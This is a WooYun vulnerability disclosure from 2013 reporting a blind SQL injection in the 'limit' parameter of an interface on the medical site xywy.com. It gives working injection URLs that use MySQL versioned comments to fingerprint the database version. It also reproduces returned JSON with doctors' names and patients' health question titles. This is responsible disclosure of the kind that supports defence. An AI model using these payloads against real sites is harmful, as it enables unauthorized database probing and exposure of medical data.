当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038386

漏洞标题:寻医问药专家网某接口存在SQL盲注漏洞

相关厂商:寻医问药

漏洞作者: 猪猪侠

提交时间:2013-09-27 21:19

修复时间:2013-11-11 21:20

公开时间:2013-11-11 21:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-27: 细节已通知厂商并且等待厂商处理中
2013-09-28: 厂商已经确认,细节仅向厂商公开
2013-10-08: 细节向核心白帽子及相关领域专家公开
2013-10-18: 细节向普通白帽子公开
2013-10-28: 细节向实习白帽子公开
2013-11-11: 细节向公众公开

简要描述:

某接口存在SQL盲注漏洞,间接利用还是有点危害的,就不深入了。

详细说明:

#1 limit 参数未严格过滤,导致存在盲注漏洞

http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50056aaaa*/
False
http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50086aaaa*/
False


返回False说明数据库版本大于 5.0.86
# 获取版本号 5.0.93 返回正常
http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50092aaaa*/
False
http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50093aaaa*/
[{"cat_id":"0","cat_name":"\u5168\u90e8","zixun":[{"0":"\u60a3\u6709\u4e59\u809d\u56db\u5e74\uff0c\u4e00\u76f4\u670d\u7528\u963f\u5fb7\u798f\u97e6","title":"\u60a3\u6709\u4e59\u809d\u56db\u5e74\uff0c\u4e00\u76f4\u670d\u7528\u963f\u5fb7\u798f\u97e6","1":"17519","r_expert":"17519","2":"504270","z_id":"504270","3":"228612","zr_id":"228612","realname":"\u4e54\u98de","nameHospital":"\u6c5f\u82cf\u7701\u4e2d\u533b\u9662","nameDepart":"\u809d\u75c5\u79d1","que_url":"http:\/\/z.xywy.com\/doc\/zhuanjiahuifu\/zjqiaofei-504270.htm","ask_url":"http:\/\/z.xywy.com\/doc\/zjqiaofei\/ask.php?doctoruser=zjqiaofei","self_url":"http:\/\/z.xywy.com\/doc\/zjqiaofei\/","hospitalURL":"http:\/\/z.xywy.com\/yiyuan-jshtcm.htm","departURL":"http:\/\/z.xywy.com\/yiyuankeshi-jshtcm-ganbingke.htm"},{"0":"\u54a8\u8be2 \u535a\u8def\u5b9a \u76f8\u5173\u95ee\u9898\uff0c\u5168\u56fd\u4e09\u7532\u533b\u9662\u4e13\u5bb6\u4e3a\u60a8\u89e3\u7b54","title":"\u54a8\u8be2 \u535a\u8def\u5b9a \u76f8\u5173\u95ee\u9898\uff0c\u5168\u56fd\u4e09\u7532\u533b\u9662\u4e13\u5bb6\u4e3a\u60a8\u89e3\u7b54","1":"17519","r_expert":"17519","2":"504822","z_id":"504822","3":"228611","zr_id":"228611","realname":"\u4e54\u98de","nameHospital":"\u6c5f\u82cf\u7701\u4e2d\u533b\u9662","nameDepart":"\u809d\u75c5\u79d1","que_url":"http:\/\/z.xywy.com\/doc\/zhuanjiahuifu\/zjqiaofei-504822.htm","ask_url":"http:\/\/z.xywy.com\/doc\/zjqiaofei\/ask.php?doctoruser=zjqiaofei","self_url":"http:\/\/z.xywy.com\/doc\/zjqiaofei\/","hospitalURL":"http:\/\/z.xywy.com\/yiyuan-jshtcm.htm","departURL":"http:\/\/z.xywy.com\/yiyuankeshi-jshtcm-ganbingke.htm"},{"0":"\u6211\u6709\u4e59\u809d\uff0c\u8fd9\u4e2a\u60c5\u51b5\u4e25\u91cd\u5417\uff1f","title":"\u6211\u6709\u4e59\u809d\uff0c\u8fd9\u4e2a\u60c5\u51b5\u4e25\u91cd\u5417\uff1f","1":"17519","r_expert":"17519","2":"506091","z_id":"506091","3":"228610","zr_id":"228610","realname":"\u4e54\u98de","nameHospital":"\u6c5f\u82cf\u7701\u4e2d\u533b\u9662","nameDepart":"\u809d\u75c5\u79d1","que_url":"http:\/\/z.xywy.com\/doc\/zhuanjiahuifu\/zjqiaofei-506091.htm","ask_url":"http:\/\/z.xywy.com\/doc\/zjqiaofei\/ask.php?doctoruser=zjqiaofei","self_url":"http:\/\/z.xywy.com\/doc\/zjqiaofei\/","hospitalURL":"http:\/\/z.xywy.com\/yiyuan-jshtcm.htm","departURL":"http:\/\/z.xywy.com\/yiyuankeshi-jshtcm-ganbingke.htm"},{"0":"CT\u63d0\u793a\u809d\u764c\u4f34\u809d\u5185\u8f6c\u79fb\uff0c\u8fd8\u80fd\u624b\u672f\u5417","title":"CT\u63d0\u793a\u809d\u764c\u4f34\u809d\u5185\u8f6c\u79fb\uff0c\u8fd8\u80fd\u624b\u672f\u5417","1":"6977","r_expert":"6977","2":"399476","z_id":"399476","3":"228609","zr_id":"228609","realname":"\u5eb7\u5efa\u7701","nameHospital":"\u6cb3\u5317\u533b\u79d1\u5927\u5b66\u7b2c\u4e8c\u533b\u9662","nameDepart":"\u5fae\u521b\u5916\u79d1","que_url":"http:\/\/z.xywy.com\/doc\/zhuanjiahuifu\/kangjiansheng-399476.htm","ask_url":"http:\/\/z.xywy.com\/doc\/kangjiansheng\/ask.php?doctoruser=kangjiansheng","self_url":"http:\/\/z.xywy.com\/doc\/kangjiansheng\/","hospitalURL":"http:\/\/z.xywy.com\/yiyuan-hb2h.htm","departURL":"http:\/\/z.xywy.com\/yiyuankeshi-hb2h-weichuangwaike.htm"},{"0":"\u8fbd\u5b81\u961c\u65b0\u77ff\u603b\u533b\u9662 \u6d88\u5316\u5185\u79d1\u836f\u7269\u809d\u635f\u4f24","title":"\u8fbd\u5b81\u961c\u65b0\u77ff\u603b\u533b\u9662 \u6d88\u5316\u5185\u79d1\u836f\u7269\u809d\u635f\u4f24","1":"17519","r_expert":"17519","2":"506388","z_id":"506388","3":"228607","zr_id":"228607","realname":"\u4e54\u98de","nameHospital":"\u6c5f\u82cf\u7701\u4e2d\u533b\u9662","nameDepart":"\u809d\u75c5\u79d1","que_url":"http:\/\/z.xywy.com\/doc\/zhuanjiahuifu\/zjqiaofei-506388.htm","ask_url":"http:\/\/z.xywy.com\/doc\/zjqiaofei\/ask.php?doctoruser=zjqiaofei","self_url":"http:\/\/z.xywy.com\/doc\/zjqiaofei\/","hospitalURL":"http:\/\/z.xywy.com\/yiyuan-jshtcm.htm","departURL":"http:\/\/z.xywy.com\/yiyuankeshi-jshtcm-ganbingke.htm"}
正常返回

漏洞证明:

# 通过以上提交的参数所返回数据,即可猜盲注测出数据库版本为 5.0.93

修复方案:

来自客户端的参数严格过滤。

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-28 12:25

厂商回复:

感谢提交BUG

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-28 14:45 | Rovegaby ( 路人 | Rank:8 漏洞数:2 | 努力)

    什么原理,还原为sql是什么?

  2. 2013-11-11 22:00 | Mutoubug ( 普通白帽子 | Rank:112 漏洞数:16 | <script>alert(wooyun);</script>)

    求科普!

  3. 2013-11-14 14:05 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    还可以这样判断数据库版本呐,同求原理

  4. 2014-02-19 10:45 | feng ( 普通白帽子 | Rank:664 漏洞数:79 | 想刷个6D)

    此洞利用mysql处理行内注释方式来进行注入